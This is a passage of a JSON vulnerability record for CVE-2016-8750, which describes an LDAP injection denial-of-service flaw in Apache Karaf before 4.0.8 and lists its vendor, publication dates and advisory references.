              ],
              "url": "http://www.securityfocus.com/bid/103098"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "security@apache.org",
              "DATE_PUBLIC": "2017-12-04T00:00:00",
              "ID": "CVE-2016-8750",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "Apache Karaf",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "prior to 4.0.8"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "Apache Software Foundation"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Apache Karaf prior to 4.0.8 used the LDAPLoginModule to authenticate users to a directory via LDAP. However, it did not encoding usernames properly and hence was vulnerable to LDAP injection attacks leading to a denial of service."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "Injection Attack"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "RHSA-2018:1322",
                  "refsource": "REDHAT",
                  "url": "https://access.redhat.com/errata/RHSA-2018:1322"
                },
                {
                  "name": "https://karaf.apache.org/security/cve-2016-8750.txt",
                  "refsource": "CONFIRM",
                  "url": "https://karaf.apache.org/security/cve-2016-8750.txt"
                },
                {
                  "name": "103098",
                  "refsource": "BID",
                  "url": "http://www.securityfocus.com/bid/103098"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
        "assignerShortName": "apache",
        "cveId": "CVE-2016-8750",
        "datePublished": "2018-02-19T15:00:00.000Z",
        "dateReserved": "2016-10-18T00:00:00.000Z",
        "dateUpdated": "2024-09-17T00:36:15.735Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }